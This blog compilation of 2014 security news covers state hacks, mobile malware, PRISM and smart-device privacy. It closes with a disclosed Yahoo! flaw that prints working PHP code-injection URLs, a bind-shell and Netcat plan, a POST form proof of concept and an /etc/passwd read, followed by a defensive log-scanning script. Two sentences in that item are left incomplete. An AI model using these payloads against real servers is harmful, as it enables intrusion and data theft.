Tuesday, 28 January 2014

Governments warned of email malware threat after Israel computer hack

Hackers successfully hijacked 15 Israeli Defense Ministry computers using targeted malware, according to security firm Seculert. The incident underlines the growing threat to governments from determined attackers.
Seculert chief technology officer Aviv Raff confirmed the attack during an interview with Reuters. He said the attackers infected the machines using malware-laden email messages.
The messages were reportedly laced with the infamous Xtreme RAT remote access Trojan and were designed to look like they came from Israel's anti-terrorist Shin Bet secret security agency.
Raff said despite successfully sinkholing the attacks, the company is yet to discover what the hackers did after the breach.
He added that the potential damage could be huge as the attackers managed to compromise a machine in the ministry's Civil Administration. This division monitors the movement of goods and people between Israel and the West Bank and Gaza.
The Xtreme RAT malware grants hackers complete control of an infected machine. It lets them execute a variety of commands that can mine data from the machine, or use it as an access point to get further into the victim's network and systems, for example.
It is currently unclear who mounted the attack, though Raff said early evidence suggests a Palestinian group is responsible. At the time of publishing Seculert and the Israeli Department of Defense had not responded to V3's request for a response to Raff's comments.
Security vendors said that the nature of the attack should serve as a warning to other government agencies around the world. Vice president of Global Accounts at Good Technology, Phil Barnett, noted it could have easily been a UK defence agency that fell victim.
"This could just as easily happen to a UK company or agency, or anywhere in the world. Location doesn't matter. It's all about understanding and protecting access points. The better visibility and control that a company has over all of its external access points, the better it can protect against attacks such as these," he said.
FireEye chief technology officer Greg Day warned businesses and government departments to expect further attacks of a similar nature.
"It's no great surprise that email is believed to be the method of infiltration. Whilst we build greater defensive controls, attacks are smart enough to recognise the communications we allow and then exploit the weakness that is hardest to fix: humans," he said.
"We do see such attacks occurring on an all too regular basis and what is key is the timely discovery and containment of such attacks. Organisations will continually be targeted, whether it is from hobbyists, who simply want to see if they are smart enough to get in, through to competing nations looking for intelligence."
State-sponsored cyber attacks are a growing threat facing the public and private sector. Security researchers from CrowdStrike reported a state-sponsored Russian hack campaign targeting the energy sector, codenamed Energetic Bear.

Windows banking Trojan jumps to target Android

Malware capable of infecting Android handsets using Windows PCs and laptops has been uncovered targeting developers.
Security response manager at Symantec Alan Neville told V3 the malware is atypical as it uses a two-stage attack process to jump from Windows PCs to Android handsets.
"It starts with a Trojan that when executed creates a new service on a Windows machine," he said. "It then targets Android devices that connect on USB. It uses the Android debugging bridge to deliver the Fakebank Trojan."
Fakebank is a notorious Trojan designed to take victims' financial data. Neville explained: "It looks for a specific set of Korean banking applications. If these are found the Trojan asks the user to install an update. When this notification is clicked it actually downloads a malicious version of the app."
Neville added that the Trojan is particularly nasty as it also has remote SMS message-monitoring capabilities. He said the complex nature of the attack indicates that the campaign is designed to target developers.
"The attack uses a new method that is quite complex. Because it uses the Android Debug Bridge, a mode that requires the user to activate it before connecting it via USB, its reach is quite limited and it is only really a threat to people like developers," he said.
F-Secure security analyst Sean Sullivan agreed, arguing that while the infection method is atypical, the more concerning element is the way the malware dupes users to download the malicious payload.
"Banking Trojans have been cross-platform for a while now, but not via a connected cable. They've used social engineering, injecting a request for phone model or number into the compromised Windows-based banking session," he told V3.
"To me, the more worrying thing about this particular Korean campaign is that the malicious app is prompting victims to replace mobile banking apps with counterfeits."
Trojans are a growing problem facing Android users. Thanks to the platform's open nature it is fairly easy for criminals to target Android, letting them load and distribute malicious applications onto third-party stores without scrutiny.
Cisco estimated that 99 percent of all mobile malware is designed to target the Android ecosystem in its latest threat report, released earlier in January.

V3 Storage Summit: ICO warns firms of storage security issues to avoid £500,000 fine

The Information Commissioner’s Office (ICO) has urged businesses to consider every issue that could affect data storage, so that they avoid falling foul of the Data Protection Act and paying a fine of up to £500,000.
Speaking to V3, group manager for technology at the ICO Simon Rice said trends such as cloud computing, bring your own device and mobile device use mean there is more to consider than ever before with data storage.
“Breaches are happening and there is no reason to suggest that, as people become more mobile or use different devices, those kinds of breaches will stop occurring. In fact they may well increase,” he said.
“The theft of devices is horrendous if you look at the number of iPhones stolen in London on a daily basis for example. These things will happen to your organisation and it’s not a matter of just thinking ‘we’ll be fine’, but about being prepared.”
In particular, Rice cited the age-old issue of encryption as a good first measure that firms must consider when assessing their data storage requirements.
“Data storage issues around laptops, USBs, mobiles and tablets feature heavily in our work and in many cases it could easily be avoided if data was encrypted. It’s not the be all and end all, but it is a good first step,” he said.
Rice added that education and user awareness are also vital. “You need to explain to employees what the risks are of using devices for storing work data or working from home and how they are accessing data.”
Ultimately firms must accept that dealing with data storage in the current era, from a security point of view, is not easy and requires hard work.
“Organisations need to appreciate that technology is difficult and that the marketing tells you it’s great, and in many ways it is, but it’s not something you can just forget about,” he said.
“It’s like having a company car. You wouldn’t have that serviced once and never looked at again: you’d get it looked at regularly. Security tools and policies need the same approach to make sure it’s working for you and your staff.”
The warnings come as organisations of all types continue to fall foul of data protection regulations. The ICO reprimanded the Royal Veterinary College when an employee lost passport photos stored on their own digital camera.
Another incident saw a sole trader fined £5,000 for failing to encrypt data stored on a hard drive that was stolen from the boot of a car while it had stopped at traffic lights. The variety of the incidents underlines the need for businesses to consider storage issues from every possible angle.

Microsoft sheds light on data theft after employee phishing scams

Microsoft has admitted that a number of legal documents were stolen during recent phishing attacks on its staff and company accounts.
The firm has been hit repeatedly by the Syrian Electronic Army in recent weeks, with both Microsoft's blogs and Skype accounts hit during the attacks.
The company has now provided more insight into the effect of these attacks, with Adrienne Hall, general manager for Trustworthy Computing Group, explaining in a blog post that it would be talking to those affected as more information comes to light.
"We have learned that there was unauthorised access to certain employee email accounts, and information contained in those accounts could be disclosed. It appears that documents associated with law enforcement inquiries were stolen," she wrote.
"If we find that customer information related to those requests has been compromised, we will take appropriate action. Out of regard for the privacy of our employees and customers – as well as the sensitivity of law enforcement inquiries – we will not comment on the validity of any stolen emails or documents."

Hall also confirmed that Microsoft is stepping up its efforts to beat cyber criminals, including better staff training and awareness of the threats they face.
"We continue to further strengthen our security," she said. "This includes ongoing employee education and guidance activities, additional reviews of technologies in place to manage social media properties, and process improvements based on the findings of our internal investigation."
The incident underlines the perils facing businesses of all sizes – and the need for strong passwords and staff education – with even a tech giant such as Microsoft caught out by cyber attacks and phishing scams.

US government declassifies some NSA PRISM data

The US Department of Justice (DoJ) has moved to let communications providers publicly disclose what data the National Security Agency (NSA) took during its PRISM operations.
Attorney general Eric Holder and the director of National Intelligence James Clapper announced the DoJ's plans in a joint statement on Monday, addressing public distrust of the government and businesses following the scandal.
"Permitting disclosure of this aggregate data resolves an important area of concern to communications providers and the public," read the statement.
"While this aggregate data was properly classified until today, the office of the director of National Intelligence, in consultation with other departments and agencies, has determined that the public interest in disclosing this information now outweighs the national security concerns that required its classification."
News of the PRISM scandal broke in 2013 when whistleblower Edward Snowden leaked classified documents to the media proving that the NSA was siphoning vast amounts of customer data from numerous companies including Microsoft, Google, Facebook, Yahoo, Twitter and Apple.
The revelation caused concerns about the US companies involved in the PRISM campaign, leading key players including Microsoft, Google, Facebook, Apple and Yahoo to demand permission to be more open about their involvement.
The companies issued a joint statement on Tuesday welcoming the declassification but they argued more work still needs to be done to ensure another spying scandal does not occur.
"We filed our lawsuits because we believe that the public has a right to know about the volume and types of national security requests we receive. We're pleased the Department of Justice has agreed that we and other providers can disclose this information," said the joint statement.
"While this is a very positive step, we'll continue to encourage congress to take additional steps to address all of the reforms we believe are needed."
The declassification is the first step in a wider set of reforms announced by president Barack Obama earlier in January. The DoJ confirmed that the reforms will allow companies to disclose key information.
"More detailed disclosures about the number of national security orders and requests issued to communications providers, and the number of customer accounts targeted under those orders and requests including the underlying legal authorities."
However, in a notable caveat, the DoJ said any PRISM data that remains central to US national security will remain classified.
The statement also indicated that the DoJ will implement other measures outlined in Obama's speech, but failed to disclose the exact details or timeframe.
"Through these new reporting methods, communications providers will be permitted to disclose more information than ever before to their customers. In the weeks ahead, additional steps must be taken in order to fully implement the reforms directed by the president," read the statement.
Many commentators have argued that the reforms outlined by Obama do not do enough to curtail European businesses' concerns.

V3 Storage Summit: CIOs need to prepare data reserves for BYOD revolution

Businesses need to prepare their systems to monitor and track data passing through and being stored on consumer-focused devices, such as Android smartphones, if they want to keep their corporate data safe from hackers, according to security firm Lookout.
Principal security engineer at Lookout Timothy Wyatt told V3 the number of threats targeting mobile devices is increasing.
"We see a high propensity of attacks targeting our user base every day. The range of attack type varies substantially. It ranges from basic toll fraud scams, that force the mobile to send messages to premium-rate numbers, to apps capable of opening up backdoors," he said.
Wyatt added that, if left unchallenged, hackers could develop attacks that use smartphones as a point of entry to businesses' main data reserves.
"We haven't seen hackers using smartphones as an entry point into corporate networks yet, but it is definitely possible," he said.
"Even in corporate environments where proper safeguards should be in place, if devices connecting to the network aren't being checked, they're presenting an opportunity for hackers."
Wyatt said businesses must start putting smart devices, such as phones and tablets, through the same scrutiny as PCs to deal with the increased threat.
"As a general lay of the land businesses need to start treating mobile devices like any other device. They should know who and what is connecting and keep a full itinerary of what data they're accessing, storing and sending," he said.
Wyatt added that the use of cloud services for storing data is a particularly dangerous practice as information stored on a phone can present an opportunity for hackers. "Email is a good example of the danger as usually it's full of sensitive information," he said.
"One of the biggest concerns is it could lead into cloud services, things like Dropbox and Box. The threat is just as true on mobile devices as it is on PCs."
The Lookout engineer said businesses should also invest in resources to educate their workforces about cyber security best practice.
"Having a policy in place that gets all employees to have passcodes on their devices is a good idea," he said.
"It's also important to make sure people have situational awareness – that they think and know about what they're doing, where they're getting apps from, what attachments they're opening."
Telecoms giant Cisco estimated that 99 percent of all mobile malware is designed to target Android in its latest threat report.

PRISM: NSA and GCHQ caught spying on Angry Birds players

Leaked documents have emerged claiming the US National Security Agency (NSA) and the UK Government Communications Headquarters (GCHQ) are using mobile applications such as Angry Birds to spy on citizens.
The Guardian reported uncovering the spy operations while examining documents leaked to it by controversial whistleblower Edward Snowden. The campaigns reportedly used the applications as an entry point into smart devices, going on to gather vast amounts of information about their owner.
The agencies' spy campaigns are reportedly so advanced that they could discern the phone's model and screen size as well as personal details about its owner including their age, gender and location.
The scale of data gathering is unclear, but a leaked document from the NSA detailed a "golden nugget" scenario where its analysts could use mobile applications as a gateway to collect information from connected networks, downloaded documents, websites visited and friend lists.
Another leaked GCHQ document from 2010 indicated that the campaigns were collecting so much data, they were struggling to store it.
The document also showed that GCHQ codenamed its mobile spy tools after characters from The Smurfs TV series. These included a "Nosey Smurf" tool that let GCHQ agents hijack control of the phone's microphone to record conversations, a "Tracker Smurf" tool that let GCHQ remotely collect the phone's location data and a "Paranoid Smurf" tool designed to hide the agency's activities from the user.
The Guardian reported that the NSA and GCHQ plan to continue developing and enhancing their mobile spying powers, though the details of how remain unknown. At the time of publishing the GCHQ had not responded to V3's request for comment on the leaked documents.
An NSA spokesman moved to downplay the significance of the campaign in an emailed statement to V3, promising that it only targeted a very specific set of people.
"The communications of people who are not valid foreign intelligence targets are not of interest to the National Security Agency," read the statement.
"Any implication that NSA's foreign intelligence collection is focused on the smartphone or social media communications of everyday Americans is not true. Moreover, NSA does not profile everyday Americans as it carries out its foreign intelligence mission. We collect only those communications that we are authorised by law to collect for valid foreign intelligence and counterintelligence purposes – regardless of the technical means used by the targets."
The spokesman added that the NSA also proactively works to delete any data it accidentally collects from an innocent phone user.
"In addition, NSA actively works to remove extraneous data, to include that of innocent foreign citizens, as early as possible in the process. Continuous and selective publication of specific techniques and tools lawfully used by NSA to pursue legitimate foreign intelligence targets is detrimental to the security of the United States and our allies – and places at risk those we are sworn to protect."
But the revelation has led to a backlash within the app development community. CEO of Rovio Entertainment – the company that makes Angry Birds – Mikael Hed, said the company has never intentionally aided the NSA and is considering altering its software to help protect its customers.
"We do not collaborate, collude, or share data with spy agencies anywhere in the world. As the alleged surveillance might be happening through third-party advertising networks, the most important conversation to be had is how to ensure user privacy is protected while preventing the negative impact on the whole advertising industry and the countless mobile apps that rely on ad networks," he said.
"In order to protect our end users, we will, like all other companies using third-party advertising networks, have to re-evaluate working with these networks if they are being used for spying purposes."
The Guardian is one of a select few publications with direct access to the PRISM files, which were originally leaked in 2013. The documents led to several revelations about the NSA and GCHQ's spy operations. The NSA was revealed to be collecting and analysing as many as 200 million text messages a day earlier in January.
US president Barack Obama announced a series of sweeping reforms designed to more strictly control how the NSA can conduct its spy operations earlier in January.
The US government implemented the first of these on Monday, allowing technology companies to disclose to the public non-critical information about their involvement in operations such as PRISM.

PRISM: Apple received almost 1,000 data requests in 2013

Apple received 927 data requests from US law enforcement and intelligence agencies from January to June 2013.
The iPhone maker revealed the figure in a statement, confirming that it handed over data in 81 percent of cases. The company said the requests generally related either to matters of national security or criminal investigations, and that any information handed over was tailored to the exact needs of the agency.
"Law enforcement requests most often relate to criminal investigations such as robbery, theft, murder and kidnapping," read the statement.
"This data represents every US national security order for data about our customers regardless of geography. We did not receive any orders for bulk data. Apple reviews each order, whether criminal or under a national security authority, to ensure that it is legally issued and as narrowly tailored as possible."
The requests related to 2,330 Apple accounts, though the company claims it only handed over information from 747 of these. It also showed that Apple objected to 102 of the account requests.
The news comes just after the US Department of Justice (DoJ) ruled to declassify a number of PRISM operation details. The DoJ moved to let companies including Apple disclose non-critical information to the public about their roles in operations such as PRISM on Monday.
The move is an opening step in a wider sweep of reforms regarding how US intelligence agencies, such as the NSA, can collect data. The reforms were detailed by president Barack Obama in a speech earlier in January.
Apple said it is working with the White House and US attorney general to be even more open about its involvement with government agencies and to protect its customers' data.
"Apple has been working closely with the White House, the US attorney general, congressional leaders and the Department of Justice to advocate for greater transparency with regard to the national security orders we receive," read the statement.
"We believe strongly that our customers have the right to understand how their personal information is being handled, and we are pleased the government has developed new rules that allow us to more accurately report law enforcement orders and national security orders in the US."
Apple claimed it has already taken proactive steps to protect its customers. "Personal conversations are protected using end-to-end encryption over iMessage and FaceTime, and Apple does not store location data, Maps searches, or Siri requests in any identifiable form," the firm said.
Apple is one of many companies battling to disclose the details of its involvement in PRISM. The PRISM scandal originally broke in 2013 when ex-CIA analyst Edward Snowden leaked documents to the press proving that the NSA was collecting vast amounts of customer data from numerous technology companies including Microsoft, Apple and Google.

These Devices May Be Spying On You (Even In Your Own Home)

Think you are safe in your own home? These innocent-looking devices may be spying on you, or performing other nefarious actions:
Your Television
Televisions may track what you watch. Some LG televisions were found to spy on not only what channels were being watched, but even transmitted back to LG the names of files on USB drives connected to the television. Hackers have also demonstrated that they can hack some models of Samsung TVs and use them as vehicles to capture data from networks to which they are attached, and even watch whatever the cameras built in to the televisions see.
Your Kitchen Appliances
Many recent-generation kitchen appliances come equipped with connectivity that allows for great convenience, but this benefit comes at a price – potential spying and security risks. Information about when you wake up in the morning (as extrapolated from data on your Internet-connected coffee maker) and your shopping habits (as determined by information garnered from your smart fridge) can help robbers target your home. Furthermore, potential vulnerabilities have been reported in smart kitchen devices for quite some time, and less than a month ago a smart refrigerator was found to have been used by hackers in a malicious email attack. You read that correctly – hackers successfully used a refrigerator to send out malicious emails.
Your DVR/Cable-Box/Satellite-TV Receiver
Providers of television programming can easily track what you are watching or recording, and can leverage that information to target advertisements more efficiently. Depending on service agreements, providers could potentially even sell this type of information to others, and, of course, they are likely to furnish this information to the government if so instructed.
Your Modem (and Internet Service Provider)
If it wanted to, or was asked by the government to do so, your ISP could easily compile a list of Internet sites with which you have communicated. Even if the providers themselves declined to spy as such, it may be possible for some of their technical employees to do so. Worse yet, since people often subscribe to Internet service from the same providers as they do television service, a single party may know a lot more about you than you might think.
Your Smartphone
Not only may your cellular provider be tracking information about you – such as with whom you communicate and your location – but it, as well as Google (in the case of Android), Apple (in the case of iPhones), or other providers of software on the device, may be aware of far more detailed actions such as what apps you install and run, when you run them, etc. Some apps sync your contacts list to the providers’ servers by default, and others have been found to ignore privacy settings. Phones may even be capturing pictures or video of you when you do not realize and sending the photos or video to criminals!
Your Webcam or Home Security Cameras
On that note, malware installed on your computer may take control of the machine’s webcam and record you – by taking photos or video – when you think the camera is off. Miss Teen USA was allegedly blackmailed by a hacker who took control of her laptop’s webcam and photographed her naked when she thought the camera was not on. Likewise, malware on computers or hackers operating on those machines could potentially intercept transmissions from security cameras attached to the same network as the devices (some cameras transmit data unencrypted), and copy such videos for their own systems. Such information is invaluable to burglars.
Your Telephone
It is common knowledge that the NSA has been tracking people’s calls, and even the changes proposed by President Obama won’t truly eliminate the spying. Of course, phone companies also track phone calls as they need call information for their billing systems. So, even if you use an old, analog phone your calls may be tracked. If you are receiving phone service from the same provider as you get your Internet and/or television service, phone records are yet another element of information that a single party knows about you.
Your Lights, Home Entertainment System, and Home Alarm System
Various newer lighting, home entertainment, and home security systems can be controlled via Wi-Fi or even across the Internet. Remote control is a great convenience, but it also raises questions as to whether information is reported to outside parties. Does your alarm provider get notified every time you come and go? Is information about your choice of audio entertainment relayed to manufacturers of the equipment on which it is played or the supplier of the music? Could hackers gather information from smart lighting, entertainment, or security devices – or the networks on which they communicate – to determine patterns of when you are home, when you are likely to have company over, and when your house is empty?
Your Thermostat (Heat and/or Air Conditioning)
Various Internet-connected thermostats are now available. They provide great convenience, but might they also be transmitting information about your preferences to others? Google’s acquisition of Nest has raised interest in this issue – but Nest is not the only provider of such technology. There are even products distributed by utilities that raise concerns. In my area, for example, the utility company offers a discount to people who install a thermostat that allows the utility to remotely cycle air conditioning on and off in case of excessive power demand. Might that thermostat – or future generations of it – also report information to the utility company?
Your Laundry Equipment
Like kitchen appliances, washers and dryers that connect to the Internet may report information that users may not realize is being shared, and that if intercepted, or misused, could help criminals identify when you are home and when you are not.
Your Medical Devices
It is not news that pacemakers, insulin pumps, and other medical devices can be hacked. But even normally functioning devices may spy on you. Various pacemakers relay patient status information over the Internet – this may be valuable in some cases, but also creates risks. Could unauthorized parties obtain information from such data in transit? What if a criminal sent out phony “pacemaker impersonating” messages stating that a patient is in distress in order to have his physician instruct him to go to the hospital – and leave his home vulnerable?
Your iPod or Other Entertainment Devices
Yes, there are still millions of people using specialized non-phone-equipped electronic devices, but these devices are often Wi-Fi enabled and pose similar risks to the smartphones discussed above. Of course if you are reading books or magazines, watching videos, or listening to audio supplied by an online provider, your choices and preferences are likely being tracked.
Coming Soon… Your Handgun
Millions of Americans keep guns in their homes, so privacy issues surrounding firearms are an issue regardless of one’s position in the perpetual American debate about gun control. In the near future so-called “smartguns” – firearms that contain computers with various safety capabilities intended to prevent accidents and curtail unauthorized use – are expected to enter the market. But, will the embedded computers also spy on the firearms’ owners? Do the guns contain circuitry that might allow law enforcement to track – or even to disable – the weapons? It is hard to imagine that governments would not be interested in adding such “features” to weapons; the US government is alleged to have installed malware onto thousands of networks and placed spy chips into computers, and is known to have lost track of weapons it intended to monitor. Would the government really treat firearms as being less worthy of being spied upon than telephones?
Vendors may attempt to address some of the aforementioned concerns, but many of the issues are sure to remain for quite some time. So, if you want to take advantage of the benefits of connectivity and smart devices, keep in mind the privacy risks and act accordingly.

Google dares hackers to hack Chrome OS - and will pay $2.71828 million as reward

Rarely do you find a company that puts itself in the crosshairs of hackers, especially when you know there are some *very* talented ones out there (remember Anonymous?). In a time where companies try to stay out of the limelight, Google is doing the exact opposite - and for the fourth time, in fact.
Google is offering $2.71828 million for hackers who manage to hack into Chrome OS, in their annual security competition event, Google Pwnium. The number itself is a geek joke, actually - it's the mathematical constant 'e', which programmers use when writing algorithms. Translated into local numbers, that's RM9million / SGD3.5 million / P123 million.
Why is Google doing this, you ask? According to their blog announcement, they want to plug all security holes in their system, and learn from 'security researchers' (which I suppose is a nicer way to call hackers). It's a bold approach, but it's a fantastic way to ensure their software is truly secure (as opposed to Microsoft Windows and Internet Explorer, which had numerous security loopholes for years).
If you're a 'security researcher' who's keen on taking up Google's challenge, e-mail security@chromium.org to register. Registration will close at 5:00 p.m. PST Monday, March 10th, 2014 (9am Tuesday for us in SEA). Official rules here.

Discovered a Remote Command Execution Vulnerability in Yahoo!

The cyber security expert Ebrahim Hegazy has found a Remote Code Execution vulnerability in a Yahoo server hosting numerous sub-domains.

The cyber security expert Ebrahim Hegazy has found a serious flaw; as explained by the analyst, the website is affected by a Remote Code Execution vulnerability. During the test Hegazy first discovered a Remote PHP Code Injection vulnerability that he later escalated to “Remote Command Execution”. The hacker found the vulnerability at the link
that refers to a Yahoo! server which hosts numerous subdomains of the company. The payload used to exploit the flaw was
What is “Remote PHP Code Injection”? A PHP code injection flaw allows an attacker to execute PHP code such as system("id") or any other PHP function or code. It occurs when a user sends untrusted data to the target through the values of (GET/POST) parameters that are reflected inside an eval() call.
Ebrahim Hegazy succeeded in injecting PHP code by manipulating the value of the parameter “sid”. In the beginning he tried to list the directories and files with dir, using the system function: http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system("dir"))}
He also tried system("ls -la"), but he noted that the target doesn’t accept any spaces in the URL. The expert then tried URL encoding the space character as %20, without success, and got the same result with double URL encoding.
E.g. http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system("ls%20-la"))}
He also tried to circumvent the restriction by using the function file_get_contents("http://sec-down.com/poc.txt"), but this test also didn’t work because of the folder permissions. Finally Ebrahim tried the following procedure:
  • Upload “bind.sh”, a bind connection script, into the /tmp directory
  • Execute it to open a bind connection on the server
  • E.g. http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system("./tmp/bind.sh"))}
  • Receive the connection from the server on Netcat, and now I will be free to run whatever commands
Knowing that Netcat could trigger defense systems, including any simple AV/IDS on the target, the expert tried another method for the attack. Thanks to Ahmed Abul-Ela and Ibrahim Mosaad he was able to execute commands using system($_POST['x2']). POC:
<form method="POST" action="http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system($_POST['x2']))}">
 <input type="text" name="x2">
 <input type="submit"></form>
Another option was to use system($_SERVER['HTTP_USER_AGENT']) and then inject the commands inside the User-Agent header. E.g. http://tw.user.mall.yahoo.com/rating/list?sid=${@print($_SERVER['HTTP_USER_AGENT'])} He noted that there are other good tricks, such as using readfile("/etc/passwd"). Sample POC for the vulnerability [allowed by Yahoo! to be made public]:
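The injection pattern described above (a ${@...(...)} expression in a query parameter, double URL encoding to get past input filtering, and a command carried in the User-Agent header) leaves a clear trace in web server access logs. The following Python script is an added example, not code from the article or from Hegazy's write-up: it parses combined-format access log lines, decodes query parameter values repeatedly to undo more than one layer of URL encoding, and flags the PHP code-injection indicators the article mentions, in both the query string and the User-Agent. The log lines, IP addresses and the list of dangerous PHP function names are constructed for the example and are assumptions, not data from the Yahoo! incident.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access log lines in combined log format (assumption: not real Yahoo! logs).
# Lines 2-4 mimic the article's payloads: plain, double URL-encoded, and User-Agent relay.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Jan/2014:18:30:01 +0200] "GET /rating/list?sid=12345 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Jan/2014:18:31:15 +0200] "GET /rating/list?sid=$%7B@print(system(%22dir%22))%7D HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Jan/2014:18:32:02 +0200] "GET /rating/list?sid=%2524%257B%2540print(system(%2522ls%2522))%257D HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Jan/2014:18:33:40 +0200] "GET /rating/list?sid=$%7B@print($_SERVER%5B'HTTP_USER_AGENT'%5D)%7D HTTP/1.1" 200 300 "-" "id"
198.51.100.4 - - [20/Jan/2014:18:34:00 +0200] "GET /rating/list?sid=67890 HTTP/1.1" 200 512 "-" "curl/7.30.0"
"""

# Combined log format: ip ident user [time] "method target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators of PHP code injection, named after what each one detects.
INDICATORS = [
    # "${@print(...)}" style: a "${" variable expression wrapping a function call
    (re.compile(r'\$\{\s*@?\s*[A-Za-z_]\w*\s*\('), 'php-interpolation-call'),
    # Calls to PHP functions that run commands or read files (the list is an assumption;
    # extend it to fit the application being monitored)
    (re.compile(r'\b(system|exec|shell_exec|passthru|eval|readfile|file_get_contents)\s*\(', re.I),
     'php-dangerous-function'),
    # Payload pulling its command from another request field ($_POST, $_SERVER, ...)
    (re.compile(r'\$_(GET|POST|SERVER|REQUEST|COOKIE)\s*\['), 'php-superglobal'),
]


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly until the string stops changing (undoes double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def match_indicators(text: str) -> list:
    """Return the names of every indicator that matches the text, in INDICATORS order."""
    return [name for pattern, name in INDICATORS if pattern.search(text)]


def scan_line(line: str):
    """Parse one access log line; return a finding dict if any field carries an indicator, else None."""
    m = LOG_RE.match(line.rstrip())
    if not m:
        return None
    hits = {}
    # parse_qsl splits on '&' before decoding, so a decoded '&' inside a payload cannot
    # create a spurious parameter; the extra decoding rounds then peel off double encoding.
    for name, value in parse_qsl(urlsplit(m['target']).query, keep_blank_values=True):
        tags = match_indicators(fully_decode(value))
        if tags:
            hits['param:' + name] = tags
    ua_tags = match_indicators(fully_decode(m['ua']))
    if ua_tags:
        hits['user-agent'] = ua_tags
    if not hits:
        return None
    return {'ip': m['ip'], 'time': m['ts'], 'status': m['status'], 'hits': hits}


def scan_log(text: str) -> list:
    """Scan every line of an access log and return the list of findings."""
    return [f for f in (scan_line(raw) for raw in text.splitlines()) if f]


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Run against the constructed log the script reports three of the five requests: the plain payload, the double-encoded one (which only becomes visible after the second decoding round) and the User-Agent relay, whose query string matches the superglobal indicator even though the header value itself ("id") looks harmless. Note that the status code is 200 on every flagged line, which is why string indicators rather than error codes are needed to find eval()-based injection.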
Timeline of the Remote Command Execution vulnerability in Yahoo!
  • Jan 20, 2014 at 6:39 PM – Initial report to Yahoo! Security Team.
  • Jan 20, 2014 at 6:56 PM – Update 1 sent to Yahoo!: the server kernel was an old one with a well-known “Local Privilege Escalation” vulnerability, which means an attacker with such a vulnerability can gain ROOT ACCESS to the server!
  • Jan 21, 2014 at 6:44 PM – Yahoo! acknowledged the vulnerability and pushed a fix for it.
Thanks to the Yahoo! Security team for the fast fix release. BTW, no news about the bounty yet! Pierluigi Paganini (Security Affairs – Remote Command Execution Vulnerability, Yahoo, hacking)